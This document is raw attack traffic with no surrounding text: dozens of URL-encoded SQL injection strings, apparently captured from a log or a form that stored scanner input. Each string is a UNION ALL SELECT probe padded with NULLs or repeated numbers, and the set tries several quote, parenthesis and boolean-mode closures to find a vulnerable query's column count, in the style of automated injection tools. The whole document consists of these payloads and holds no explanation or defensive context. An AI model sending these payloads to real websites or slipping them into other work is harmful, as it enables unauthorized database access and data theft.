1%27%20%2B%20%28SELECT%20%27YKXr%27%20WHERE%206305%3D6305%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27QGHZ%27%20WHERE%208873%3D8873%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -9171%29%20UNION%20ALL%20SELECT%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329--%20 -4150%29%20UNION%20ALL%20SELECT%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550%2C%207550--%20 -6766%29%20UNION%20ALL%20SELECT%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048--%20 -6037%29%20UNION%20ALL%20SELECT%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884--%20 -5646%29%20UNION%20ALL%20SELECT%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581--%20 -2841%29%20UNION%20ALL%20SELECT%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867--%20 -8567%29%20UNION%20ALL%20SELECT%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012--%20 -6810%29%20UNION%20ALL%20SELECT%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388--%20 -7495%29%20UNION%20ALL%20SELECT%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648--%20 -8730%29%20UNION%20ALL%20SELECT%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896%2C%208896--%20 -8990%27%29%20UNION%20ALL%20SELECT%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389--%20 -7956%27%29%20UNION%20ALL%20SELECT%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311--%20 -1743%27%29%20UNION%20ALL%20SELECT%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448%2C%205448--%20 -4948%27%29%20UNION%20ALL%20SELECT%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089--%20 -7812%27%29%20UNION%20ALL%20SELECT%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580--%20 -2756%27%29%20UNION%20ALL%20SELECT%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654%2C%207654--%20 -6031%27%29%20UNION%20ALL%20SELECT%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710--%20 -7208%27%29%20UNION%20ALL%20SELECT%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472%2C%207472--%20 -9581%27%29%20UNION%20ALL%20SELECT%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703--%20 -7223%27%29%20UNION%20ALL%20SELECT%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276%2C%208276--%20 -3919%27%20UNION%20ALL%20SELECT%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250--%20 -8886%27%20UNION%20ALL%20SELECT%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499%2C%206499--%20 -1707%27%20UNION%20ALL%20SELECT%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730--%20 -2737%27%20UNION%20ALL%20SELECT%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084%2C%208084--%20 -3359%27%20UNION%20ALL%20SELECT%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703--%20 -4115%27%20UNION%20ALL%20SELECT%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387%2C%206387--%20 -2633%27%20UNION%20ALL%20SELECT%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392--%20 -5247%27%20UNION%20ALL%20SELECT%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394%2C%201394--%20 -9810%27%20UNION%20ALL%20SELECT%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603--%20 -8493%27%20UNION%20ALL%20SELECT%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551--%20 -6419%22%20UNION%20ALL%20SELECT%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668--%20 -3761%22%20UNION%20ALL%20SELECT%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393--%20 -2067%22%20UNION%20ALL%20SELECT%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981--%20 -4772%22%20UNION%20ALL%20SELECT%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497--%20 